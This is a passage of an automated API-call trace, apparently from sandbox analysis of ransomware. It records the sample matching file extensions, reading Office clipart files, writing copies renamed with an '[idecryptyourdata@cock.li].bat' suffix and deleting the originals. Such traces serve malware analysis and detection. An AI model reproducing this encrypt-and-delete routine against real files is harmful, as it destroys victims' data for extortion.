lstrlenW (lpString=".dbf") returned 4 [0183.225] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.225] lstrlenW (lpString=".1cd") returned 4 [0183.225] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.225] lstrlenW (lpString=".jpg") returned 4 [0183.226] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.226] lstrlenW (lpString=".doc") returned 4 [0183.226] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.226] lstrlenW (lpString=".docx") returned 5 [0183.226] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.226] lstrlenW (lpString=".pdf") returned 4 [0183.226] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.226] lstrlenW (lpString=".xls") returned 4 [0183.226] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.226] lstrlenW (lpString=".xlsx") returned 5 [0183.226] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.226] lstrlenW (lpString=".ppt") returned 4 [0183.226] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.226] lstrlenW (lpString=".zip") returned 4 [0183.226] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.226] lstrlenW (lpString=".rar") returned 4 [0183.226] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.226] lstrlenW (lpString=".bz2") returned 4 [0183.226] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.226] lstrlenW (lpString=".7z") returned 3 [0183.226] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.226] lstrlenW (lpString=".dbf") returned 4 [0183.226] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.226] lstrlenW (lpString=".1cd") returned 4 [0183.226] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 68 [0183.226] lstrlenW (lpString=".jpg") returned 4 [0183.226] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.227] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.227] lstrlenW (lpString="J0107290.WMF") returned 12 [0183.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.227] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=12308) returned 1 [0183.227] CloseHandle (hObject=0x378) returned 1 [0183.227] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf")) returned 0x220 [0183.227] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.228] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.228] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0183.228] GetLastError () returned 0x0 [0183.228] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x3014, lpOverlapped=0x0) returned 1 [0183.234] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x3020, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x3020, lpOverlapped=0x0) returned 1 [0183.236] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.236] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.236] SetEndOfFile (hFile=0x37c) returned 1 [0183.236] CloseHandle (hObject=0x37c) returned 1 [0183.236] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.236] SetEndOfFile (hFile=0x378) returned 1 [0183.237] CloseHandle (hObject=0x378) returned 1 [0183.237] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.238] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107290.wmf")) returned 1 [0183.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.238] lstrlenW (lpString=".doc") returned 4 [0183.238] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.238] lstrlenW (lpString=".docx") returned 5 [0183.238] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0183.238] lstrlenW (lpString=".pdf") returned 4 [0183.238] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.238] lstrlenW (lpString=".xls") returned 4 [0183.238] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.238] lstrlenW (lpString=".xlsx") returned 5 [0183.238] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0183.238] lstrlenW (lpString=".ppt") returned 4 [0183.238] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.238] lstrlenW (lpString=".zip") returned 4 [0183.238] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.238] lstrlenW (lpString=".rar") returned 4 [0183.238] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.238] lstrlenW (lpString=".bz2") returned 4 [0183.238] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.239] lstrlenW (lpString=".7z") returned 3 [0183.239] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.239] lstrlenW (lpString=".dbf") returned 4 [0183.239] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.239] lstrlenW (lpString=".1cd") returned 4 [0183.239] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.239] lstrlenW (lpString=".jpg") returned 4 [0183.239] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.239] lstrlenW (lpString=".doc") returned 4 [0183.239] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.239] lstrlenW (lpString=".docx") returned 5 [0183.239] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0183.239] lstrlenW (lpString=".pdf") returned 4 [0183.239] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.239] lstrlenW (lpString=".xls") returned 4 [0183.239] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.239] lstrlenW (lpString=".xlsx") returned 5 [0183.239] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0183.239] lstrlenW (lpString=".ppt") returned 4 [0183.239] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.239] lstrlenW (lpString=".zip") returned 4 [0183.239] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.239] lstrlenW (lpString=".rar") returned 4 [0183.239] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.239] lstrlenW (lpString=".bz2") returned 4 [0183.240] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.240] lstrlenW (lpString=".7z") returned 3 [0183.240] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.240] lstrlenW (lpString=".dbf") returned 4 [0183.240] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.240] lstrlenW (lpString=".1cd") returned 4 [0183.240] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107290.WMF") returned 68 [0183.240] lstrlenW (lpString=".jpg") returned 4 [0183.240] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.240] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.240] lstrlenW (lpString="J0107300.WMF") returned 12 [0183.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.241] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=2460) returned 1 [0183.241] CloseHandle (hObject=0x378) returned 1 [0183.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf")) returned 0x220 [0183.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.241] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.241] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0183.242] GetLastError () returned 0x0 [0183.242] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x99c, lpOverlapped=0x0) returned 1 [0183.244] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x9a0, lpOverlapped=0x0) returned 1 [0183.245] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.245] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.245] SetEndOfFile (hFile=0x37c) returned 1 [0183.245] CloseHandle (hObject=0x37c) returned 1 [0183.245] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.245] SetEndOfFile (hFile=0x378) returned 1 [0183.246] CloseHandle (hObject=0x378) returned 1 [0183.246] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.246] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107300.wmf")) returned 1 [0183.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.247] lstrlenW (lpString=".doc") returned 4 [0183.247] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.247] lstrlenW (lpString=".docx") returned 5 [0183.247] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0183.247] lstrlenW (lpString=".pdf") returned 4 [0183.247] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.247] lstrlenW (lpString=".xls") returned 4 [0183.247] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.247] lstrlenW (lpString=".xlsx") returned 5 [0183.247] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0183.247] lstrlenW (lpString=".ppt") returned 4 [0183.247] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.247] lstrlenW (lpString=".zip") returned 4 [0183.247] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.247] lstrlenW (lpString=".rar") returned 4 [0183.247] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.247] lstrlenW (lpString=".bz2") returned 4 [0183.247] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.247] lstrlenW (lpString=".7z") returned 3 [0183.247] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.247] lstrlenW (lpString=".dbf") returned 4 [0183.247] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.247] lstrlenW (lpString=".1cd") returned 4 [0183.247] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.247] lstrlenW (lpString=".jpg") returned 4 [0183.247] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.247] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.248] lstrlenW (lpString=".doc") returned 4 [0183.248] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.248] lstrlenW (lpString=".docx") returned 5 [0183.248] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0183.248] lstrlenW (lpString=".pdf") returned 4 [0183.248] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.248] lstrlenW (lpString=".xls") returned 4 [0183.248] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.248] lstrlenW (lpString=".xlsx") returned 5 [0183.248] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0183.248] lstrlenW (lpString=".ppt") returned 4 [0183.248] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.248] lstrlenW (lpString=".zip") returned 4 [0183.248] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.248] lstrlenW (lpString=".rar") returned 4 [0183.248] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.248] lstrlenW (lpString=".bz2") returned 4 [0183.248] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.248] lstrlenW (lpString=".7z") returned 3 [0183.248] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.248] lstrlenW (lpString=".dbf") returned 4 [0183.248] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.248] lstrlenW (lpString=".1cd") returned 4 [0183.248] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.248] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107300.WMF") returned 68 [0183.248] lstrlenW (lpString=".jpg") returned 4 [0183.248] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.249] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0183.249] lstrlenW (lpString="J0107302.WMF") returned 12 [0183.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.249] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=4136) returned 1 [0183.249] CloseHandle (hObject=0x378) returned 1 [0183.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf")) returned 0x220 [0183.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0183.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0183.250] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.250] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0183.251] GetLastError () returned 0x0 [0183.251] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1028, lpOverlapped=0x0) returned 1 [0183.253] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1030, lpOverlapped=0x0) returned 1 [0183.255] ReadFile (in: hFile=0x378, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0183.255] WriteFile (in: hFile=0x37c, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0183.256] SetEndOfFile (hFile=0x37c) returned 1 [0183.256] CloseHandle (hObject=0x37c) returned 1 [0183.256] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0183.256] SetEndOfFile (hFile=0x378) returned 1 [0183.257] CloseHandle (hObject=0x378) returned 1 [0183.257] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0183.257] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107302.wmf")) returned 1 [0183.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.257] lstrlenW (lpString=".doc") returned 4 [0183.257] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0183.257] lstrlenW (lpString=".docx") returned 5 [0183.257] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0183.257] lstrlenW (lpString=".pdf") returned 4 [0183.257] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0183.257] lstrlenW (lpString=".xls") returned 4 [0183.257] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0183.257] lstrlenW (lpString=".xlsx") returned 5 [0183.257] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0183.258] lstrlenW (lpString=".ppt") returned 4 [0183.258] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0183.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.258] lstrlenW (lpString=".zip") returned 4 [0183.258] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0183.258] lstrlenW (lpString=".rar") returned 4 [0183.258] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0183.258] lstrlenW (lpString=".bz2") returned 4 [0183.258] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0183.258] lstrlenW (lpString=".7z") returned 3 [0183.258] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0183.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.258] lstrlenW (lpString=".dbf") returned 4 [0183.258] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0183.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.258] lstrlenW (lpString=".1cd") returned 4 [0183.258] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0183.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107302.WMF") returned 68 [0183.258] lstrlenW (lpString=".jpg") returned 4 [0183.258] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0183.258] lstrlenW 